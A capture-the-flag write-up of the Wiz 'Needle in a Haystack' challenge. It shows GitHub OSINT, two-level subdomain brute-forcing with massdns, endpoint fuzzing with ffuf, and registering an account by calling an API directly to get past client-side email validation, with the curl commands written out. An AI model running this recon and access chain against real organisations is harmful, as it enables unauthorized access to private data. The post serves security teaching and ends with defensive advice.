Wiz CTF September 2025: Needle in a Haystack - Hunting the Rogue Developer's Unauthorized Chatbot

Challenge Overview

This Wiz CTF challenge simulated a realistic insider threat scenario: a developer at Ack-Me Corp built an unauthorized side-project chatbot containing sensitive company data. The mission was to track down this hidden application and extract the flag through reconnaissance, subdomain enumeration, and API exploitation.

Challenge Scenario:

We have got intelligence that one of our developers at Ack-Me Corp is working on a weekend side-project where he is vibe coding an internal knowledge-base chatbot for our company, where he put all of our customer records and sensitive data inside it.

Your mission, if you choose to accept it - is to track down the website and obtain the secret flag.

DNS Enumeration Shell Environment:

=== DNS Enumeration Shell ===
Available tools:
  - massdns: High-performance DNS stub resolver
  - subfinder: Subdomain discovery tool
  - ffuf: Web fuzzer for directory/file discovery (limited to 5 threads)
  - httpx: HTTP toolkit for probing
  - curl, wget: HTTP clients
  - nslookup, dig, host: DNS tools
  - nmap: Network scanner
  - jq: Command-line JSON processor

Wordlists available in: /opt/wordlists/
  - subdomain-wordlist.txt: Subdomain enumeration wordlist
  - api-objects.txt: API endpoint/object discovery wordlist for ffuf

Resolvers available in: /opt/massdns/

Attack Steps

1. GitHub OSINT - Finding the Developer

I started by searching GitHub for the company domain to see if any developer had leaked infrastructure information:

Search Query: ackme-corp.net

GitHub search revealing alejandro-pigeon user

Discovery:

Found GitHub user: alejandro-pigeon
User had repositories related to ackme-corp.net

2. Git History Analysis - Internal Domain Discovery

I examined the commit history in the developer’s repositories:

Git commit revealing testing.internal.ackme-corp.net

Critical Finding:

Commit messages revealed reference to testing.internal.ackme-corp.net
This became the starting point for subdomain enumeration

3. DNS Reconnaissance - Confirming the Domain

dig testing.internal.ackme-corp.net

DNS query showing NOERROR with no A record

Result:

DNS returned NOERROR status (domain exists in DNS)
No A record present - indicating the domain exists but needs subdomain discovery
This confirmed we were on the right track but needed to go deeper

4. First-Level Subdomain Enumeration

I created a wordlist targeting the internal domain:

# Generate subdomain list
for sub in $(cat /opt/wordlists/subdomain-wordlist.txt); do
  echo "$sub.testing.internal.ackme-corp.net"
done > subs.txt

# Verify the wordlist
head subs.txt

Initial Attempt with massdns (Simple Output):

massdns -r /opt/massdns/trusted-resolvers.txt subs.txt -o S -w results.txt

This showed OK: 1 (0.02%) but results.txt was empty. The issue was the output format.

Retry with JSON Output:

massdns -r /opt/massdns/trusted-resolvers.txt subs.txt -o J -w results.json

# Filter out non-existent domains
cat results.json | grep -v NXDOMAIN

massdns discovering pprod subdomain

Discovery:

Found subdomain: pprod.testing.internal.ackme-corp.net
This suggested there might be another level of subdomains to discover

5. Second-Level Subdomain Enumeration (Going Deeper!)

I performed subdomain enumeration on the discovered pprod subdomain to see if there were any nested services:

# Create second-level subdomain wordlist
for sub in $(cat /opt/wordlists/subdomain-wordlist.txt); do
  echo "$sub.pprod.testing.internal.ackme-corp.net"
done > level2_subs.txt

# Run massdns on second level
massdns -r /opt/massdns/trusted-resolvers.txt level2_subs.txt -o J -w level2_results.json
cat level2_results.json | grep -v NXDOMAIN

Discovering coding.pprod subdomain

Critical Discovery:

Found: coding.pprod.testing.internal.ackme-corp.net
This matched the “vibe coding” reference from the challenge description!

6. Application Discovery - The Developer’s Chatbot

Accessing the discovered application:

curl http://coding.pprod.testing.internal.ackme-corp.net

Findings:

Login page for the chatbot application
Footer contained reference: vibecodeawebsitetoday.com
This was the external platform used to build and host the API backend — the internal domain served the chatbot UI, while vibecodeawebsitetoday.com was the actual API service it talked to

7. API Endpoint Discovery - Finding the Docs

Using ffuf to discover API endpoints on the external vibe coding platform:

ffuf -u https://vibecodeawebsitetoday.com/FUZZ \
     -w /opt/wordlists/api-objects.txt \
     -mc 200,301,302

ffuf discovering /docs endpoint

Discovery:

Found /docs endpoint containing API documentation
Documentation revealed authentication requirements

8. API Documentation Analysis - Authentication Flow

API docs showing app_id requirement

Key Requirements:

Login endpoint requires app_id parameter
The chatbot application must have an embedded app_id

9. Application ID Extraction

Searching the login page source for the application ID:

curl -s http://coding.pprod.testing.internal.ackme-corp.net/login | grep -i "app"

Extracting app_id from HTML source

Extracted:

Application ID successfully retrieved from HTML source
Now had all parameters needed for authentication

10. Client-Side Validation Bypass - Understanding the Weakness

Initial login attempt with random credentials:

Client-side email validation

API accepting non-corporate email

Critical Finding:

Client-side JavaScript validated that emails must be @ackme-corp.net
However, the server-side API accepted any email format
This was a classic client-side validation bypass vulnerability
Server responded with 401 User not found but accepted the request format

Key Insight: Since the API accepted arbitrary emails, I could register my own user account!

11. User Registration - Creating Access

Bypassing the client-side validation by calling the API directly:

curl -X POST https://vibecodeawebsitetoday.com/api/register \
  -H "Content-Type: application/json" \
  -d '{
    "email": "attacker@example.com",
    "password": "Password123!",
    "app_id": "extracted_app_id"
  }'

Successful user registration

Success:

Registration returned 200 OK
User account successfully created
Ready to authenticate and access the chatbot

12. Authentication and Flag Retrieval

Logging in with the newly created account:

# Login and capture session token
curl -isS -X POST https://vibecodeawebsitetoday.com/api/login \
  -H "Content-Type: application/json" \
  -d '{
    "email": "attacker@example.com",
    "password": "Password123!",
    "app_id": "extracted_app_id"
  }'

Extracted:

Session token from Set-Cookie: session_token=XXXXX header

Accessing the Chatbot:

curl -s https://vibecodeawebsitetoday.com/api/chat \
  -H "Cookie: session_token=XXXXX" \
  -d '{"query": "What is the flag?"}'

Chatbot revealing the flag

Flag: WIZ_CTF{N33dl3_F0und_1n_Th3_H4yst4ck}

Key Takeaways

This challenge demonstrated a realistic attack chain combining multiple reconnaissance and exploitation techniques:

Attack Chain Summary

OSINT (GitHub Search): Identified developer through public repository commits
Git History Analysis: Discovered internal domain references in commit messages
DNS Enumeration: Confirmed domain existence through DNS queries
First-Level Subdomain Discovery: Found pprod.testing.internal.ackme-corp.net
Second-Level Subdomain Discovery: Found coding.pprod.testing.internal.ackme-corp.net
Application Discovery: Located the unauthorized chatbot application
API Endpoint Discovery: Found API documentation through directory fuzzing
Authentication Analysis: Understood authentication requirements and app_id mechanism
Client-Side Bypass: Identified client-side email validation vulnerability
User Registration: Created unauthorized account by calling API directly
Authentication: Obtained session token through API login
Data Access: Queried chatbot to retrieve sensitive flag

Technical Lessons

DNS Enumeration:

Use JSON output format (-o J) for easier parsing with massdns
Multi-level subdomain enumeration is critical in complex infrastructure
Don’t stop at the first level - nested subdomains often hide interesting services

OSINT:

Public repositories often contain infrastructure references in commits
Developers may inadvertently leak internal domain names
Git history is a goldmine for reconnaissance

Client-Side Security:

Client-side validation is purely cosmetic and can be bypassed
Always validate on the server-side, never trust client input
API endpoints must enforce the same validation as the UI

API Security:

Directory fuzzing against known domains can reveal documentation endpoints
API documentation should be access-controlled
Application IDs embedded in HTML are not secrets

Security Recommendations

For Developers:

Never rely on client-side validation alone - always validate server-side
Keep internal infrastructure references out of public repositories
Use .gitignore to prevent committing sensitive configuration
Don’t embed API keys or app IDs in client-side code

For Organizations:

Monitor for shadow IT - unauthorized applications built by employees
Implement subdomain monitoring - track new subdomains appearing in your infrastructure
Require security review for internal tools - even “weekend projects” can expose data
Use private repositories - prevent reconnaissance through public commits
Implement network segmentation - internal development environments should be isolated

For Defenders:

Perform regular GitHub reconnaissance - search for your domain in public repos
Monitor DNS queries for enumeration patterns - unusual subdomain query volumes
Audit all API endpoints - ensure validation is consistent between client and server
Require authentication for API documentation - don’t expose API structure publicly

Tools and Techniques Used

Reconnaissance:

GitHub search for domain references
Git commit history analysis
DNS queries with dig

Subdomain Enumeration:

massdns with custom wordlists
Multi-level enumeration (subdomains of subdomains)
JSON output parsing with grep

Web Discovery:

ffuf for directory/endpoint fuzzing
curl for API interaction
HTML source inspection for app_id extraction

Exploitation:

Client-side validation bypass
Direct API calls with curl
Session token extraction from HTTP headers

Failed Approaches and Learning

1. Initial massdns Output Format Issues

Used -o S (simple output) which didn’t write results properly
Switched to -o J (JSON output) for reliable parsing
Lesson: Choose output formats that support your parsing workflow

2. Trying subfinder and ffuf for Subdomain Enumeration

These tools failed in the restricted shell environment
massdns proved more reliable with custom resolvers
Lesson: Have multiple tools in your toolkit and understand their strengths

3. Attempting to Bypass Authentication Without Understanding the Flow

Initially tried to guess API endpoints without documentation
Discovery of /docs endpoint revealed the proper authentication flow
Lesson: Finding documentation is often faster than brute force

Real-World Context

This challenge simulates several real-world scenarios:

Shadow IT Risk: Developers building unauthorized applications with corporate data happens regularly in enterprises. These side projects often:

Lack security review or oversight
Use production data in development environments
Bypass corporate security controls
Expose sensitive information through improper access controls

Information Leakage through Git: Public repositories frequently leak:

Internal domain names and infrastructure
API endpoints and service architecture
Configuration files with credentials
Comments containing security-relevant information

Client-Side Validation Vulnerabilities: Many applications still rely on JavaScript validation alone, creating vulnerabilities where:

Attackers can call APIs directly
Access controls can be bypassed
Input validation can be circumvented

Conclusion

This “Needle in a Haystack” challenge demonstrated that modern penetration testing requires more than just exploitation, it requires patience, thorough reconnaissance, and the ability to piece together information from multiple sources. This rabbit was fun!

The attack succeeded not through complex exploits, but through:

Systematic reconnaissance and enumeration
Understanding multi-level infrastructure hierarchies
Recognizing client-side security weaknesses
Thinking like a developer who took shortcuts

Final Stats:

OSINT and initial discovery: ~2 hours (over 2 months of break, :D)
Subdomain enumeration (two levels): ~4 hours
API discovery and analysis: ~3 hours
Client-side bypass and exploitation: ~2 hours
Total: ~12 hours

What Made This Challenge Great:

Realistic scenario (shadow IT is a real problem)
Multi-stage reconnaissance requiring different techniques
Combined OSINT, DNS enumeration, and web exploitation
Required methodical enumeration at multiple infrastructure levels
Client-side validation bypass is a common real-world vulnerability

Personal Takeaway: This challenge reinforced that thorough reconnaissance is often more valuable than sophisticated exploits. Sometimes the key to finding the needle is simply being methodical in searching the haystack, one level at a time.